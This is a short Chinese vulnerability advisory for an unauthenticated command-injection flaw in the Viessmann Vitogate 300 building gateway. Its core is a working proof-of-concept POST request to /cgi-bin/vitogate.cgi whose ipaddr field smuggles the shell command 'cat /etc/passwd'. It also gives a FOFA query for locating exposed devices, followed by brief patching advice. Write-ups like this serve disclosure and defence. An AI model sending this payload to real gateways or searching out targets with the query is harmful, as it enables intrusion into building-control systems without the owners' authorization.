0x01 产品简介
Viessmann Vitogate 300是用于将Viessmann LON连接到BACnet或Modbus的网关。
0x02 漏洞概述
Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。
0x03 影响范围
version <= 2.1.3.0
0x04 复现环境
FOFA:app="Vitogate-300"
0x05 漏洞复现
PoC
POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: your-ip
Content-Type: application/json
{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}
0x06 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
